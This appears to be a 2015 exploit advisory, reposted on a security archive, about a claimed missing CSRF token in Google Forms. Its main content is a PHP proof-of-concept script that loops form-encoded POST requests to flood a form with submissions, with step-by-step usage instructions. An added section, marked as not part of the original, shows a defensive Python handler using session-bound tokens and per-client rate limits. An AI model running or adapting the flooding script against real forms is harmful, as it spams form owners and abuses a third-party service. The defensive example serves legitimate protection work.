Google Forms CSRF bypass data flooding

2015.07.05
Credit: alqnas eslam
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: csrf google forms data flooding
# Date: 29-6-2015
# Exploit Author: alqnas eslam
# Vendor Homepage: fb.com/alqnas4
# Software Link: https://docs.google.com
# Tested on: windows or linux
========================================================
Description:
Google does not set a token in the forms, so an attacker can flood a form with submitted data.
========================================================
Steps:
1- Open any form in Google Forms.
2- Get the input names and the form action (you can use Burp Suite).
3- Edit my PHP code and put in the input names, the action and the number of submissions you want to send.
4- Run the code on any server.
==========================================================
PoC:

<?php
// Allow a long run time; set once before the loop
ini_set('max_execution_time', 50000);

// Send $data as a form-encoded POST to $url and return the response body
function post_to_url($url, $data) {
    $fields = '';
    foreach ($data as $key => $value) {
        $fields .= $key . '=' . urlencode($value) . '&';
    }
    $fields = rtrim($fields, '&'); // rtrim() returns the trimmed string

    $post = curl_init();
    curl_setopt($post, CURLOPT_URL, $url);
    curl_setopt($post, CURLOPT_POST, true);
    curl_setopt($post, CURLOPT_POSTFIELDS, $fields);
    curl_setopt($post, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($post);
    curl_close($post);
    return $result;
}

// number of submissions to send: 10
$i = 1;
while ($i <= 10) {
    $data = array(
        // input name        => input value
        "entry.1749181457" => "test alqnas eslam",
        "entry.1360610555" => "01119032582",
        "entry.660237368" => "info test",
        "entry.319716724" => "alqnast@yahoo.com",
        "entry.1363501645" => "19",
        "draftResponse" => "",
        "pageHistory" => "0",
        "fbzx" => "-2167671423753092324"
    );
    // action of the form
    post_to_url("https://docs.google.com/forms/action", $data);
    $i++;
}
?>

======================================================================
The result after you run the code:
http://cdn.top4top.net/i_128f910c611.jpg
======================================================================
PoC explanation video on YouTube:
http://youtu.be/kHJi_8UNjxw
==============================================
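From the form owner's side, the following is an added example (not part of the original advisory and not Google's code) of a submission handler that enforces the two checks relevant here: a token bound to the session and form, which is the control the advisory says is missing, and a per-client submission cap, which is what bounds scripted flooding even when a valid token is presented. The class name, policy values, session IDs and client addresses are assumptions constructed for the illustration.

```python
import hashlib
import hmac
import secrets
from collections import defaultdict, deque

SECRET = secrets.token_bytes(32)   # server-side key (constructed for this example)
WINDOW_SECONDS = 60                # assumed policy: look-back window
MAX_SUBMISSIONS = 3                # assumed policy: accepted posts per client per window


def issue_token(session_id: str, form_id: str) -> str:
    """Token rendered into the form as a hidden field, bound to session and form."""
    msg = f"{session_id}:{form_id}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


class SubmissionGate:
    """Accepts a form POST only with a valid token and under the rate cap."""

    def __init__(self):
        self._seen = defaultdict(deque)  # (client, form) -> timestamps of accepted posts

    def check(self, session_id, form_id, token, client, now):
        expected = issue_token(session_id, form_id)
        # Constant-time comparison; an empty or foreign token is refused outright.
        if not token or not hmac.compare_digest(expected.encode(), token.encode()):
            return "rejected: bad or missing token"
        stamps = self._seen[(client, form_id)]
        while stamps and now - stamps[0] >= WINDOW_SECONDS:
            stamps.popleft()             # drop entries that left the window
        if len(stamps) >= MAX_SUBMISSIONS:
            return "rejected: rate limit"
        stamps.append(now)
        return "accepted"


def replay_constructed_traffic():
    """Ten scripted posts in ten seconds, one token-less post, then a later normal post."""
    gate = SubmissionGate()
    token = issue_token("sess-A", "form-1")
    results = [gate.check("sess-A", "form-1", token, "198.51.100.7", t) for t in range(10)]
    results.append(gate.check("sess-B", "form-1", "", "203.0.113.9", 10))
    results.append(gate.check("sess-A", "form-1", token, "198.51.100.7", 70))
    return results


if __name__ == "__main__":
    for outcome in replay_constructed_traffic():
        print(outcome)
```

In the replay, the loop of ten posts is cut off after the third even though every request carries a valid token, which is why the cap is needed alongside the token.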

References:

http://youtu.be/kHJi_8UNjxw
http://fb.com/alqnas4



Copyright 2024, cxsecurity.com

 
